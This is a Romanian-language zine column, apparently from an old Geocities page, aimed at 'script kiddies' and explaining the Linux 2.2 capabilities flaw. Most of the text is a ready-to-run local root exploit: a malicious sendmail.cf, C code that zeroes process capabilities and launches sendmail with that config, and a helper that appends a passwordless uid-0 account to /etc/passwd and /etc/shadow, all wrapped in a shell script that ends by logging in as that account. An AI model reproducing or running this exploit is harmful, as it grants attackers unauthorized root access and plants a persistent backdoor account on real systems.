sKript Kiddo - Despre cum sa iei root pe un Linux    
 

Incepand din acest numar, m-am gandit sa infiintzez o rubrica pentru "script kiddies", nu de alta, dar sunt un tip foarte lenesh, shi tzin minte ca pe vremuri nu de mult apuse, eram ahtiat dupa programele ushor de folosit, care sa imi ofere root in nu mai mult de 10 minute pe diferite linux-box-uri. Si cum printre cititorii revistei sunt cu sigurantza sunt doritori...

Recent, s-a descoperit ca in kernelele 2.2.x exista o mare problema, si tocmai despre aceasta problema o sa discutam astazi.

"Capabilitatzile" cerute de unul din standardele POSIX au fost recent implementate in kernelul de Linux. Mai exact de pe la 2.2. incoace. Aceste "capabilitatzi" sunt de fapt un nou mod de contol al privilegiilor, care spun de fapt intr-un mod mai specific ce pot sa faca procesele privilegiate (nu vreau sa fiu foarte rautacios cu cititorii revistei, dar shtitzi ce-s alea procese, nu?).
Problema cu aceste capabilitati este ca ele se mostenesc de la procesul tata la procesul fiu asa cum sunt. Si acuma modul de exploatare: Daca setam toti capabilitatile la 0 (adica cel mai neprivilegiat mod cu putiintza), un program cum este sendmail care incearca sa faca un setgid si setuid inainte de a face lucruri care pot dauna sistemului daca sunt rulate ca root, nu va mai reusi sa faca acest lucru, si va rula in continuare ca root. Si daca ai un program care ruleaza ca root, si care face tot ce vrei tu, mai e vreo problema sa controlezi masina resprectiva ? Eu cred ca nu.

Bun. Si cum rubrica se numeste "sKript Kiddo", sa vedem acuma scriptul care face toate povestea sa functioneze cum trebuie. Dar nu va grabiti. Mai intai sa va explic ce vreau sa fac. In primul rand am de gand sa ma joc de-a sendmail-u. Adica sa folosesc sendmailul ca shperaclu in sistem. Si dupa cum stiti, sendmailul are un fisier de configurare, pe care-l chiama sendmail.cf. Ei bine, mie nu imi place acel fisier, asa ca o sa scriu altul. Apoi am de gand sa fac un programel care sa arunce in aer privilegiile lui sendmail, astfel incat sendmail sa nu mai poata sa faca setuid si setgid, iar apoi sendmail.cf-ul scris de mine o sa-i spuna sendmail-ului sa ruleze un program care va scrie in /etc/passwd shi in /etc/shadow o noua linie, care imi va da cont de root.

Deci. Copiati tot ce urmeaza intr-un fisier pe care il veti denumi sendmail.cf. La sfarsitul fisierului, cam a 15-a linie de sus in jos, exista o linie comentata. Urmati indicatiile.

--- Cut Here (sendmail.cf) --
V8/Berkeley
Cwlocalhost
Fw/etc/sendmail.cw
DSlocalhost
CO @ % !
C..
C[[
Kaccess hash -o /etc/mail/access
FR-o /etc/mail/relay-domains
Kdequote dequote
CE root
DnMAILER-DAEMON
CPREDIRECT
DZ8.9.3
O SevenBitInput=False
O EightBitMode=pass8
O AliasWait=10
O AliasFile=/etc/aliases
O MinFreeBlocks=100
O BlankSub=.
O HoldExpensive=False
O DeliveryMode=background
O AutoRebuildAliases=True
O TempFileMode=0600
O HelpFile=/usr/lib/sendmail.hf
O SendMimeErrors=True
O ForwardPath=$z/.forward.$w:$z/.forward
O ConnectionCacheSize=2
O ConnectionCacheTimeout=5m
O UseErrorsTo=False
O LogLevel=9
O CheckAliases=False
O OldStyleHeaders=True
O PrivacyOptions=authwarnings
O QueueDirectory=/tmp
O Timeout.connect=1m
O Timeout.queuereturn=5d
O Timeout.queuewarn=4h
O SuperSafe=True
O StatusFile=/var/log/sendmail.st
O DefaultUser=8:12
O TryNullMXList=true
O RefuseLA=12
O MaxDaemonChildren=20
O ConnectionRateThrottle=1
O HostsFile=/etc/hosts
O SmtpGreetingMessage=$j Sendmail $v/$Z; $b
O UnixFromLine=From $g $d
O OperatorChars=.:%@!^/[]+
O DontProbeInterfaces=true
Pfirst-class=0
Pspecial-delivery=100
Plist=-30
Pbulk=-60
Pjunk=-100
Troot
Tdaemon
Tuucp
H?P?Return-Path: <$g>
HReceived: $?sfrom $s $.$?_($?s$|from $.$_)
$.by $j ($v/$Z)$?r with $r$. id $i$?u
for $u; $|;
$.$b
H?D?Resent-Date: $a
H?D?Date: $a
H?F?Resent-From: $?x$x <$g>$|$g$.
H?F?From: $?x$x <$g>$|$g$.
H?x?Full-Name: $x
H?M?Resent-Message-Id: <$t.$i@$j>
H?M?Message-Id: <$t.$i@$j>
S3
R$@ $@ <@>
R$* $: $1 <@> mark addresses
R$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>
R@ $* <@> $: @ $1 unmark @host:...
R$* :: $* <@> $: $1 :: $2 unmark node::addr
R:include: $* <@> $: :include: $1 unmark :include:...
R$* [ $* : $* ] <@> $: $1 [ $2 : $3 ] unmark IPv6 addrs
R$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon
R$* : $* <@> $: $2 strip colon if marked
R$* <@> $: $1 unmark
R$* ; $1 strip trailing semi
R$* < $* ; > $1 < $2 > bogus bracketed semi
R$@ $@ :; <@>
R$* $: < $1 > housekeeping <>
R$+ < $* > < $2 > strip excess on left
R< $* > $+ < $1 > strip excess on right
R<> $@ < @ > MAIL FROM:<> case
R< $+ > $: $1 remove housekeeping <>
R@ $+ , $+ @ $1 : $2 change all "," to ":"
R@ $+ : $+ $@ $>96 < @$1 > : $2 handle <route-addr>
R $+ : $* ; @ $+ $@ $>96 $1 : $2 ; < @ $3 > list syntax
R $+ : $* ; $@ $1 : $2; list syntax
R$+ @ $+ $: $1 < @ $2 > focus on domain
R$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right
R$+ < @ $+ > $@ $>96 $1 < @ $2 > already canonical
R$* < @ $* : $* > $* $1 < @ $2 $3 > $4 nix colons in addrs
R$- ! $+ $@ $>96 $2 < @ $1 .UUCP > resolve uucp names
R$+ . $- ! $+ $@ $>96 $3 < @ $1 . $2 > domain uucps
R$+ ! $+ $@ $>96 $2 < @ $1 .UUCP > uucp subdomains
R$* % $* $1 @ $2 First make them all @s.
R$* @ $* @ $* $1 % $2 @ $3 Undo all but the last.
R$* @ $* $@ $>96 $1 < @ $2 > Insert < > and finish
R$* $@ $>96 $1
S96
R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all
R$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain
R$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain
R$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [a.b.c.d]
R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal
R$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr
R$* < @ $+ . UUCP > $* $: $1 < @ $[ $2 $] . UUCP . > $3
R$* < @ $+ . . UUCP . > $* $@ $1 < @ $2 . > $3
R$* < @ $=w > $* $: $1 < @ $2 . > $3
R$* < @ $j > $* $: $1 < @ $j . > $2
R$* < @ $=M > $* $: $1 < @ $2 . > $3
R$* < @ $* $=P > $* $: $1 < @ $2 $3 . > $4
R$* < @ $* . . > $* $1 < @ $2 . > $3
S4
R$* <@> $@ handle <> and list:;
R$* < @ $+ . > $* $1 < @ $2 > $3
R$* < @ *LOCAL* > $* $1 < @ $j > $2
R$* < $+ > $* $1 $2 $3 defocus
R@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical
R@ $* $@ @ $1 ... and exit
R$+ @ $- . UUCP $2!$1 [email protected] => h!u
R$+ % $=w @ $=w $1 @ $2 u%host@host => u@host
S97
R$* $: $>3 $1
R$* $@ $>0 $1
S0
R$* $: $>Parse0 $1 initial parsing
R<@> $#local $: <@> special case error msgs
R$* $: $>98 $1 handle local hacks
R$* $: $>Parse1 $1 final parsing
SParse0
R<@> $@ <@> special case error msgs
R$* : $* ; <@> $#error $@ 5.1.3 $: "List:; syntax illegal for recipient addresses"
#R@ <@ $* > < @ $1 > catch "@@host" bogosity
R<@ $+> $#error $@ 5.1.3 $: "User address required"
R$* $: <> $1
R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3
R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "Colon illegal in host name part"
R<> $* $1
R$* < @ . $* > $* $#error $@ 5.1.2 $: "Invalid host name"
R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "Invalid host name"
R$* < @ > $* $@ $>Parse0 $>3 $1 user@ => user
R< @ $=w . > : $* $@ $>Parse0 $>3 $2 @here:... -> ...
R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@here
R< @ $+ > $#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ $=w . > $@ $>Parse0 $>3 $1 $2 $3 ...@here -> ...
R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"
R< @ *LOCAL* > $#error $@ 5.1.3 $: "User address required"
R$* $=O $* < @ *LOCAL* >
$@ $>Parse0 $>3 $1 $2 $3 ...@*LOCAL* -> ...
R$* < @ *LOCAL* > $: $1
SParse1
R$* < @ [ $+ ] > $* $: $>98 $1 < @ [ $2 ] > $3 numeric internet spec
R$* < @ [ $+ ] > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 still numeric: send
R$+ < @ $=w . > $: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1 < @ $2 . >
R<@> $+ + $* < @ $* . >
$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >
R<@> $+ + $* < @ $* . >
$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >
R<@> $+ < @ $+ . > $: < $(virtuser @ $2 $@ $1 $: @ $) > $1 < @ $2 . >
R<@> $+ $: $1
R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2
R< $+ > $+ < @ $+ > $: $>97 $1
R$=L < @ $=w . > $#local $: @ $1 special local names
R$+ < @ $=w . > $#local $: $1 regular local name
R$* < @ $* > $* $: $>95 < $S > $1 < @ $2 > $3 glue on smarthost name
R$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 [email protected]
R$=L $#local $: @ $1 special local names
R$+ $#local $: $1 regular local names
S5
R$+ + * $#local $@ $&h $: $1
R$+ + $* $#local $@ + $2 $: $1 + *
R$+ $: <> $1
R< > $+ $: < $H > $1 try hub
R< > $+ $: < $R > $1 try relay
R< > $+ $: < > < $1 $&h > nope, restore +detail
R< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part
R< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +
R< > < $+ > $@ $1 no +detail
R$+ $: $1 <> $&h add +detail back in
R$+ <> + $* $: $1 + $2 check whether +detail
R$+ <> $* $: $1 else discard
R< local : $* > $* $: $>95 < local : $1 > $2 no host extension
R< error : $* > $* $: $>95 < error : $1 > $2 no host extension
R< $- : $+ > $+ $: $>95 < $1 : $2 > $3 < @ $2 >
R< $+ > $+ $@ $>95 < $1 > $2 < @ $1 >
S95
R< > $* $@ $1 strip off null relay
R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2
R< local : $* > $* $>CanonLocal < $1 > $2
R< $- : $+ @ $+ > $*<$*>$* $# $1 $@ $3 $: $2<@$3> use literal user
R< $- : $+ > $* $# $1 $@ $2 $: $3 try qualified mailer
R< $=w > $* $@ $2 delete local host
R< $+ > $* $#relay $@ $1 $: $2 use unqualified mailer
SCanonLocal
R< $* > < @ $+ > : $+ $@ $>97 $3
R< $* > $+ $=O $+ < @ $+ > $@ $>97 $2 $3 $4
R< $* > $* < @ $* . > $: < $1 > $2 < @ $3 >
R< > $* < @ $* > $* $#local $@ $1@$2 $: $1
R< > $+ $#local $@ $1 $: $1
R< $+ @ $+ > $* < @ $* > $: < $1 > $3 < @ $4 >
R< $+ > $* <@ $* > $* $#local $@ $2@$3 $: $1
R< $+ > $* $#local $@ $2 $: $1
S93
R$=E < @ *LOCAL* > $@ $1 < @ $j . > leave exposed
R$=E < @ $=M . > $@ $1 < @ $2 . >
R$=E < @ $=w . > $@ $1 < @ $2 . >
R$* < @ $=M . > $* $: $1 < @ $2 . @ $M > $3 convert masqueraded doms
R$* < @ $=w . > $* $: $1 < @ $2 . @ $M > $3
R$* < @ *LOCAL* > $* $: $1 < @ $j . @ $M > $2
R$* < @ $+ @ > $* $: $1 < @ $2 > $3 $M is null
R$* < @ $+ @ $+ > $* $: $1 < @ $3 . > $4 $M is not null
S94
R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2
S98
R wmail.$- $# wmail $: $1
R wmail.$- < @ $=w . > $# wmail $: $1
R wmail.$- < @ [ $=w ] . > $# wmail $: $1
R wmail.$- < @ [ $+ ] . > $# wmail $: $1
R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT . > < ${opMode} >
R$* < @ $+ .REDIRECT. > <i> $: $1 < @ $2 . REDIRECT. >
R$* < @ $+ .REDIRECT. > < $- > $# error $@ 5.1.1 $: "551 User has moved; please try " <$1@$2>
SLookUpDomain
R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>
R<?> <$+.$+> <$+> <$*> $@ $>LookUpDomain <$2> <$3> <$4>
R<?> <$+> <$+> <$*> $@ <$2> <$3>
R<$*> <$+> <$+> <$*> $@ <$1> <$4>
SLookUpAddress
R<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>
R<?> <$+.$-> <$+> <$*> $@ $>LookUpAddress <$1> <$3> <$4>
R<?> <$+> <$+> <$*> $@ <$2> <$3>
R<$*> <$+> <$+> <$*> $@ <$1> <$4>
SCanonAddr
R$* $: $>Parse0 $>3 $1 make domain canonical
R< @ $+ > : $* @ $* < @ $1 > : $2 % $3 change @ to % in src route
R$* < @ $+ > : $* : $* $3 $1 < @ $2 > : $4 change to % hack.
R$* < @ $+ > : $* $3 $1 < @ $2 >
SParseRecipient
R$* $: <?> $>CanonAddr $1
R<?> $* < @ $* . > <?> $1 < @ $2 > strip trailing dots
R<?> $- < @ $* > $: <?> $(dequote $1 $) < @ $2 > dequote local part
R<?> $* $=O $* < @ $* > $: <NO> $1 $2 $3 < @ $4>
R<?> $* $@ $1
R<NO> $* < @ $* $=R > $: <RELAY> $1 < @ $2 $3 >
R<NO> $* < @ $+ > $: $>LookUpDomain <$2> <NO> <$1 < @ $2 >>
R<$+> <$+> $: <$1> $2
R<RELAY> $* < @ $* > $@ $>ParseRecipient $1
R<$-> $* $@ $2
SLocal_check_relay
Scheck_relay
R$* $: $1 $| $>"Local_check_relay" $1
R$* $| $* $| $#$* $#$3
R$* $| $* $| $* $@ $>"Basic_check_relay" $1 $| $2
SBasic_check_relay
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R$+ $| $+ $: $>LookUpDomain < $1 > <?> < $2 >
R<?> < $+ > $: $>LookUpAddress < $1 > <?> < $1 >
R<?> < $+ > $: $1
R<OK> < $* > $@ OK
R<RELAY> < $* > $@ RELAY
R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"
R<DISCARD> $* $#discard $: discard
R<$+> $* $#error $@ 5.7.1 $: $1
SLocal_check_mail
Scheck_mail
R$* $: $1 $| $>"Local_check_mail" $1
R$* $| $#$* $#$2
R$* $| $* $@ $>"Basic_check_mail" $1
SBasic_check_mail
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R<> $@ <OK>
R$* $: <?> $>CanonAddr $1
R<?> $* < @ $+ . > <?> $1 < @ $2 > strip trailing dots
R<?> $* < $* $=P > $* $: <OK> $1 < @ $2 $3 > $4
R<?> $* < @ $+ > $* $: <OK> $1 < @ $2 > $3 ... unresolvable OK
R<$+> $* < @localhost > $: < ? $&{client_name} > <$1> $2 < @localhost >
R<$+> $* < @localhost.$m >
$: < ? $&{client_name} > <$1> $2 < @localhost.$m >
R<$+> $* < @localhost.UUCP >
$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP >
R<? $=w> <$+> $* <?> <$2> $3
R<? $+> <$+> $* $#error $@ 5.5.4 $: "553 Real domain name required"
R<?> <$+> $* $: <$1> $2
R<$+> $* < @ $+ > $* $: <USER $(access $2@ $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $* > $*
$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $+ < @ $+ > $*
$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4
R<USER ?> <$+> $* < @ $+ > $*
$: $>LookUpDomain <$3> <$1> <>
R<?> $* $: <USER $(access $1@ $: ? $) > <?> $1
R<USER $+> <$+> $* $: <$1> $3
R<?> $* $: < ? $&{client_name} > $1
R<?> $* $@ <OK> ...local unqualed ok
R<? $+> $* $#error $@ 5.5.4 $: "553 Domain name required"
...remote is not
R<?> $* $@ <OK>
R<OK> $* $@ <OK>
R<TEMP> $* $#error $@ 4.1.8 $: "451 Sender domain must resolve"
R<PERM> $* $#error $@ 5.1.8 $: "501 Sender domain must exist"
R<RELAY> $* $@ <RELAY>
R<DISCARD> $* $#discard $: discard
R<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"
R<$+> $* $#error $@ 5.7.1 $: $1 error from access db
SLocal_check_rcpt
Scheck_rcpt
R$* $: $1 $| $>"Local_check_rcpt" $1
R$* $| $#$* $#$2
R$* $| $* $@ $>"Basic_check_rcpt" $1
SBasic_check_rcpt
R$* $: < ${deliveryMode} > $1
R< d > $* $@ deferred
R< $* > $* $: $2
R$* $: $>ParseRecipient $1 strip relayable hosts
R$* $: <?> $1
R<?> $+ < @ $=w > $: <> <USER $1> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>
R<?> $+ < @ $* > $: <> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>
R<?> $+ $: <> <USER $1> <$1>
R<> <USER $+> $* $: <$(access $1 $: $)> $2
R<> <FULL $+> $* $: <$(access $1 $: $)> $2
R<OK> <FULL $+> $* $: <$(access $1 $: $)> $2
R<> <HOST $+> $* $: <$(access $1 $: $)> $2
R<OK> <HOST $+> $* $: <$(access $1 $: $)> $2
R<> <$*> $: $1
R<OK> <$*> $: $1
R<RELAY> <$*> $: $1
R<REJECT> $* $#error $@ 5.2.1 $: "550 Mailbox disabled for this recipient"
R<$+> $* $#error $@ 5.2.1 $: $1 error from access db
R$+ < @ $=w > $@ OK
R$+ < @ $* $=R > $@ OK
R$+ < @ $* > $: $>LookUpDomain <$2> <?> <$1 < @ $2 >>
R<RELAY> $* $@ RELAY
R<$*> <$*> $: $2
R$* $: <?> $1
R<?> $* < @ $+ > $: <REMOTE> $1 < @ $2 >
R<?> $+ $@ OK
R<$+> $* $: $2
R$* $: <?> $&{client_name}
R<?> [$+] $: <BAD> [$1]
R<?> $* $~P $: <?> $[ $1 $2 $]
R<$-> $* $: $2
R$* . $1 strip trailing dots
R$@ $@ OK
R$=w $@ OK
R$* $=R $@ OK
R$* $: $>LookUpDomain <$1> <?> <$1>
R<RELAY> $* $@ RELAY
R<$*> <$*> $: $2
R$* $: $&{client_addr}
R$@ $@ OK originated locally
R0 $@ OK originated locally
R$=R $* $@ OK relayable IP address
R$* $: $>LookUpAddress <$1> <?> <$1>
R<RELAY> $* $@ RELAY relayable IP address
R<$*> <$*> $: $2
R$* $: [ $1 ] put brackets around it...
R$=w $@ OK ... and see if it is local
R$* $#error $@ 5.7.1 $: "550 Relaying denied"
Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,
A=procmail -Y -m $h $f $u
Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Mesmtp, P=[IPC], F=mDFMuXa, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Msmtp8, P=[IPC], F=mDFMuX8, S=11/31, R=21, E=\r\n, L=990,
T=DNS/RFC822/SMTP,
A=IPC $h
Mrelay, P=[IPC], F=mDFMuXa8, S=11/31, R=61, E=\r\n, L=2040,
T=DNS/RFC822/SMTP,
A=IPC $h
S11
R$+ $: $>51 $1 sender/recipient common
R$* :; <@> $@ list:; special case
R$* $: $>61 $1 qualify unqual'ed names
R$+ $: $>94 $1 do masquerading
S21
R$+ $: $>51 $1 sender/recipient common
R$+ $: $>61 $1 qualify unqual'ed names
S31
R$+ $: $>51 $1 sender/recipient common
R:; <@> $@ list:; special case
R$* <@> $* $@ $1 <@> $2 pass null host through
R< @ $* > $* $@ < @ $1 > $2 pass route-addr through
R$* $: $>61 $1 qualify unqual'ed names
R$+ $: $>93 $1 do masquerading
S51
R< @ $+ > $* $@ < @ $1 > $2 resolve <route-addr>
R$+ < @ $+ .UUCP. > $: < $2 ! > $1 convert to UUCP form
R$+ < @ $* > $* $@ $1 < @ $2 > $3 not UUCP form
R< $&h ! > $- ! $+ $@ $2 < @ $1 .UUCP. >
R< $&h ! > $-.$+ ! $+ $@ $3 < @ $1.$2 >
R< $&h ! > $+ $@ $1 < @ $&h .UUCP. >
R< $+ ! > $+ $: $1 ! $2 < @ $Y > use UUCP_RELAY
R$+ < @ $+ : $+ > $@ $1 < @ $3 > strip mailer: part
R$+ < @ > $: $1 < @ *LOCAL* > if no UUCP_RELAY
S61
R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
R$+ $@ $1 < @ *LOCAL* > add local qualification
S71
R$+ $: $>61 $1
R$+ $: $>93 $1
#inlocuiti pe linia urmatoare stringul /calea/spre cu directorul curent
#eg: /home/user
Mlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=add -Y -a $h -d $u

Mprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/,
T=X-Unix,
A=sh -c $u
Mwmail, P=/usr/local/wMail/wmail,
F=lsD, S=10/30, R=20/40, D=/tmp/,
T=X-Unix,
A=/usr/local/wMail/wmail $u
S10
R<@> $n errors to mailer-daemon
R@ <@ $*> $n temporarily bypass Sun bogosity
R$+ $: $>50 $1 add local domain if needed
R$* $: $>94 $1 do masquerading
S20
R$+ < @ $* > $: $1 strip host part
S30
R<@> $n errors to mailer-daemon
R@ <@ $*> $n temporarily bypass Sun bogosity
R$+ $: $>50 $1 add local domain if needed
R$* $: $>93 $1 do masquerading
S40
R$+ $: $>50 $1 add local domain if needed
S50
R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified
R$+ $@ $1 < @ *LOCAL* > add local qualification

--- Cut here (gata) --

Si in sfarshit scriptul

--- CUT HERE ---
#!/bin/sh
#
# Acest script este adaptat si modificat dupa programele care au
# fost publicate pe lista de discutzii BUGTRAQ.
# Folosirea lui poate produce pagube si este in general impotriva legii
# Personal va recomand sa nu il folositi.
# De asemenea, recomad sa nu il distribuitzi, cu toate ca este sub
# licentza GPL
echo creez fisierele sursa
cat <<gata1> ex.c
#include <linux/capability.h>

int main (void) {
cap_user_header_t header;
cap_user_data_t data;

header = malloc(8);
data = malloc(12);

header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;

data->inheritable = data->effective = data->permitted = 0;
capset(header, data);

execlp("/usr/sbin/sendmail", "sendmail" ,"-t", "-C", "./sendmail.cf", NULL);
}

gata1

echo shi acuma cel de-al doilea
cat <<gata.2> add.c

#include <fcntl.h>

int main (void) {
int fd;
char string[250];

seteuid(0);
setegid(0);
setuid(0);
setgid(0);

system("chmod u+w /etc/shadow");

fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "shmekeru::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);

}

gata.2
echo compilez...
gcc -o add add.c
gcc -o ex ex.c
cat <<gata3> mailexp
From: [email protected]
To: root@localhost
Subject: foo
bar
.

gata3
echo rulez xploitu
./ex < mailexp
echo shi acuma ashteptatzi un pic...
sleep 10
echo root access pentru dumneavoastra
echo daca nu exista ssh instalat in sistem incercati
echo su shmekeru
ssh -lshmekeru localhost


-- Cut here (done) --

   

BloomY    
Hosted by www.Geocities.ws

1